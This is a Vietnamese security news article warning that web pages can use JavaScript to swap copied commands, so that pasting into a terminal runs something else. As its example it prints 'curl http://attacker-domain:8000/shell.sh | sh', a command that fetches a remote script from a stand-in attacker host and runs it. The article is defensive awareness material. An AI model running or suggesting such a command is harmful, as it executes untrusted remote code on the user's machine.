🔥 UBND xã Kroong, thành Phố Kon Tum đã đăng ký tín nhiệm. 🔥                    🔥 Trường Tiểu học Vinh Quang đã đăng ký tín nhiệm. 🔥                    🔥 Ủy ban nhân dân xã Măng Cành, huyện Kon Plông, tỉnh Kon Tum đã đăng ký tín nhiệm. 🔥                    🔥 CỔNG THÔNG TIN ĐIỆN TỬ XÃ ĐẠ ĐỜN đã đăng ký tín nhiệm. 🔥                    🔥 Uỷ Ban Nhân Dân Thị Trấn Chợ Rã đã đăng ký tín nhiệm. 🔥                   

Đừng copy-paste câu lệnh trực tiếp từ các trang web, bạn có thể bị hack

05/01/2022

Gần đây, Gabriel Friedlander, nhà sáng lập Wizer đã cảnh báo về nguy cơ bị xâm phạm hệ thống khi thực hiện copy-paste (sao chép-dán) các lệnh (command) từ các trang web vào console hoặc terminal.

Việc sao chép các lệnh thường dùng từ một trang web và dán chúng vào ứng dụng Windows command prompt hoặc Linux terminal là điều bình thường đối với các nhà lập trình/phát triển ứng dụng, quản trị viên hệ thống,...

Friedlander cảnh báo rằng nội dung bạn sao chép có thể được thay thế và khác với những gì bạn dự định copy được hiển thị trên trang web.

Nếu không kiểm tra kỹ lại, bạn có thể đã sao chép các lệnh độc hại và thực thi các lệnh khiến hệ thống của bạn có thể bị xâm phạm.

Trên một blog, Friedlander đưa ra ví dụ đơn giản để khai thác bằng cách yêu cầu bạn đọc sao chép một câu lệnh đơn giản mà hầu hết các quản trị viên và các nhà phát triển đều biết:

Sau đó, hãy dán những gì bạn đã sao chép từ blog của Friedlander vào một ứng dụng soạn thảo như text box hoặc Notepad, kết quả nhận được có thể khiến bạn ngạc nhiên:

Câu lệnh nhận được sau khi dán: curl http://attacker-domain:8000/shell.sh | sh

Bạn sẽ nhận được một lệnh hoàn toàn khác được lưu vào vùng nhớ tạm (clipboard) và lệnh này có thể chứa một ký tự “newline” (hoặc “return”) ở cuối.

Ký tự này sẽ khiến câu lệnh được thực thi ngay sau khi nó được dán trực tiếp vào terminal.

Bạn có thể nghĩ rằng mình đang sao chép một câu lệnh vô hại được sử dụng để cập nhật các phần mềm đã cài đặt trên hệ thống nhưng thực tế thì không phải vậy.

Nguyên nhân của vấn đề

Vấn đề nằm ở mã JavaScript được nhúng trong trang HTML do Friedlander tạo ra: Ngay sau khi bạn sao chép câu lệnh "sudo apt update", đoạn mã sẽ được thực thi và thay thế dữ liệu bạn đã sao chép với nội dung độc hại khác.

Mã JavaScript thay đổi nội dung sao chép

Một người dùng Reddit cũng đưa ra một ví dụ khác để khai thác bằng cách sử dụng HTML và CSS để tạo ra các câu lệnh ẩn thay thế nội dung hiển thị trên web sẽ được sao chép khi bạn copy.

Đây là lý do tại sao bạn không bao giờ nên sao chép các lệnh trên trang web và dán trực tiếp vào terminal/console. Bạn nên dán nó vào một ứng dụng soạn thảo văn bản và kiểm tra kỹ trước khi sử dụng.

Nguồn: bleepingcomputer.com.

scrolltop